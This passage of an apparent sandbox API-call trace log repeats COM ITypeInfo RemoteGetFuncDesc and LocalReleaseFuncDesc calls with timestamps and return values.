(This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x70, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x71, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x72, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x73, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x74, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x75, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x76, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x77, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x78, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x79, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.300] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x80, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x81, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x82, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x83, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x84, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x85, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x86, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x87, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x88, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x89, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.301] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x90, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x91, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x92, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x93, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x94, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x95, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x96, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x97, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x98, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x99, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9a, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9b, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9c, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9d, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9e, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9f, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa0, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa1, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa2, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.302] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa3, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa4, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa5, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa6, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa7, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa8, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa9, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaa, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xab, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xac, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xad, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xae, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaf, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb0, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb1, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb2, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb3, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb4, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb5, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.303] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb6, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb7, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb8, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb9, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xba, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbb, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbc, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbd, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbe, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbf, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc0, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc1, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc2, ppFuncDesc=0x2066a8, pDummy=0x140 | out: ppFuncDesc=0x2066a8, pDummy=0x140) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc3, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc4, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc5, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc6, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc7, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc8, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.304] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc9, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xca, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcb, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcc, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcd, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xce, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcf, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd0, ppFuncDesc=0x2066a8, pDummy=0xc0 | out: ppFuncDesc=0x2066a8, pDummy=0xc0) returned 0x0 [0045.305] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.305] ITypeInfo:RemoteGetFuncDesc (in: 